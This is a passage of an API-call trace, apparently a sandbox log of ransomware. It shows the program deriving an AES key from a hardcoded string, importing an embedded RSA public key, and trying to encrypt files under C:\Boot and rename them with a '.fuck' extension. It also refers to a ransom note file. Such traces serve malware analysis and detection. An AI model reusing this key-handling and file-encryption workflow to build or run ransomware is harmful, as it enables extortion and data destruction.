[0231.608] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.608] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.608] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.608] GetLastError () returned 0x12 [0231.608] GetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0231.609] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.609] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.609] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.609] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.609] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781aa0) returned 1 [0231.611] CryptCreateHash (in: hProv=0x2781aa0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.611] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.611] CryptHashData (hHash=0x2716b68, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.611] CryptDeriveKey (in: hProv=0x2781aa0, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716de8) returned 1 [0231.611] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.611] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.611] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2780cd0) returned 1 [0231.612] CryptImportPublicKeyInfo (in: hCryptProv=0x2780cd0, dwCertEncodingType=0x1, pInfo=0x277ca90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277cac0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277cac8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716928) returned 1 [0231.612] CryptEncrypt (in: hKey=0x2716928, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.612] CryptEncrypt (in: hKey=0x2716928, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781990*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781990*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.612] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781990, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.612] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2782b10, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.612] CryptEncrypt (in: hKey=0x2716de8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.612] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.612] CloseHandle (hObject=0xffffffff) returned 1 [0231.612] CloseHandle (hObject=0xffffffff) returned 1 [0231.612] CopyFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.613] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.613] DeleteFileA (lpFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.gsg")) returned 0 [0231.613] MoveFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nb-NO\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.fuck")) returned 0 [0231.613] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.613] CryptDestroyKey (hKey=0x2716de8) returned 1 [0231.613] CryptReleaseContext (hProv=0x2781aa0, dwFlags=0x0) returned 1 [0231.613] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.613] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.613] GetLastError () returned 0x5 [0231.613] GetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui")) returned 0x20 [0231.614] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.614] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.614] CreateFileA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.614] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.614] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2780b38) returned 1 [0231.616] CryptCreateHash (in: hProv=0x2780b38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.616] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.616] CryptHashData (hHash=0x2716868, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.616] CryptDeriveKey (in: hProv=0x2780b38, Algid=0x6610, hBaseData=0x2716868, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716968) returned 1 [0231.616] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.616] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.616] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2780e68) returned 1 [0231.617] CryptImportPublicKeyInfo (in: hCryptProv=0x2780e68, dwCertEncodingType=0x1, pInfo=0x277cc30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277cc60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277cc68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27169a8) returned 1 [0231.617] CryptEncrypt (in: hKey=0x27169a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.617] CryptEncrypt (in: hKey=0x27169a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781198*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781198*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.617] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781198, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.617] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2782b10, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.617] CryptEncrypt (in: hKey=0x2716968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.617] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.617] CloseHandle (hObject=0xffffffff) returned 1 [0231.617] CloseHandle (hObject=0xffffffff) returned 1 [0231.617] CopyFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.617] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.618] DeleteFileA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.gsg")) returned 0 [0231.618] MoveFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.fuck")) returned 0 [0231.618] CryptDestroyHash (hHash=0x2716868) returned 1 [0231.618] CryptDestroyKey (hKey=0x2716968) returned 1 [0231.618] CryptReleaseContext (hProv=0x2780b38, dwFlags=0x0) returned 1 [0231.618] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.618] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.618] FindClose (in: hFindFile=0x2716c68 | out: hFindFile=0x2716c68) returned 1 [0231.618] GetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\README_BACK_FILES.htm" (normalized: "c:\\boot\\nb-no\\readme_back_files.htm")) returned 0x20 [0231.618] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.619] FindFirstFileA (in: lpFileName="C:\\\\Boot\\nl-NL\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716de8 [0231.620] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.620] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.620] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.620] GetLastError () returned 0x12 [0231.620] GetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0231.620] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.620] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.621] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.621] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.621] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2780f78) returned 1 [0231.623] CryptCreateHash (in: hProv=0x2780f78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.623] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.623] CryptHashData (hHash=0x2716be8, pbData=0x2ec968, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.623] CryptDeriveKey (in: hProv=0x2780f78, Algid=0x6610, hBaseData=0x2716be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27168a8) returned 1 [0231.623] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.623] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.623] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781220) returned 1 [0231.623] CryptImportPublicKeyInfo (in: hCryptProv=0x2781220, dwCertEncodingType=0x1, pInfo=0x277d1e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d210*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d218*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716968) returned 1 [0231.624] CryptEncrypt (in: hKey=0x2716968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.624] CryptEncrypt (in: hKey=0x2716968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27814c8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27814c8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.624] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27814c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.624] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.624] CryptEncrypt (in: hKey=0x27168a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.624] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.624] CloseHandle (hObject=0xffffffff) returned 1 [0231.624] CloseHandle (hObject=0xffffffff) returned 1 [0231.624] CopyFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.624] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.625] DeleteFileA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.gsg")) returned 0 [0231.625] MoveFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.fuck")) returned 0 [0231.625] CryptDestroyHash (hHash=0x2716be8) returned 1 [0231.625] CryptDestroyKey (hKey=0x27168a8) returned 1 [0231.625] CryptReleaseContext (hProv=0x2780f78, dwFlags=0x0) returned 1 [0231.625] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.625] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.625] GetLastError () returned 0x5 [0231.625] GetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui")) returned 0x20 [0231.626] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.626] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.626] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.626] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.627] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781440) returned 1 [0231.630] CryptCreateHash (in: hProv=0x2781440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.630] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.630] CryptHashData (hHash=0x27168e8, pbData=0x2ec698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.630] CryptDeriveKey (in: hProv=0x2781440, Algid=0x6610, hBaseData=0x27168e8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716b68) returned 1 [0231.630] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.630] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.630] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781110) returned 1 [0231.630] CryptImportPublicKeyInfo (in: hCryptProv=0x2781110, dwCertEncodingType=0x1, pInfo=0x277cdd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277ce00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277ce08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716e68) returned 1 [0231.630] CryptEncrypt (in: hKey=0x2716e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.630] CryptEncrypt (in: hKey=0x2716e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27815d8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27815d8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.630] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27815d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.630] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.630] CryptEncrypt (in: hKey=0x2716b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.631] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.631] CloseHandle (hObject=0xffffffff) returned 1 [0231.631] CloseHandle (hObject=0xffffffff) returned 1 [0231.631] CopyFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.631] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.631] DeleteFileA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.gsg")) returned 0 [0231.631] MoveFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.fuck")) returned 0 [0231.631] CryptDestroyHash (hHash=0x27168e8) returned 1 [0231.631] CryptDestroyKey (hKey=0x2716b68) returned 1 [0231.631] CryptReleaseContext (hProv=0x2781440, dwFlags=0x0) returned 1 [0231.632] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.632] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.632] FindClose (in: hFindFile=0x2716de8 | out: hFindFile=0x2716de8) returned 1 [0231.632] GetFileAttributesA 